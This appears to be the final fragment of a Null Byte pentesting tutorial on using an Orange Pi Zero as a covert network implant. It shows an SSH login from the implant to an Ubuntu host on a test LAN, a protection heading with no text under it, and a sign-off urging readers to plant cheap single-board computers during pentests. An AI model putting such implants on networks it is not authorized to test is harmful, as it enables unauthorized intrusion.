root@orangepizero:~# ssh -p 22 tokyoneon@192.168.8.183

The authenticity of host &#39;192.168.8.183 (192.168.8.183)&#39; can&#39;t be established.
ECDSA key fingerprint is SHA256:3QmOhr8syz8l4HBWICG53DdVE2fStfHdO2Ri/nU4hBc.
Are you sure you want to continue connecting (yes/no)? Yes

Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-29-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Mon Apr 15 07:27:14 2019 from 127.0.0.1

tokyoneon@ubuntu:~$

How to Protect Yourself Against Network Implant Attacks

Setting up the Orange Pi Zero and performing these attacks on my test networks was a lot of fun. I highly encourage readers to give this kind of attack a try and deploy cheap SBCs during pentesting engagements.

Until next time, you can follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions.

Don&#39;t Miss: Intercept & Decrypt Windows Passwords on a Local Network

Cover photo by tokyoneon/Null Byte




Source link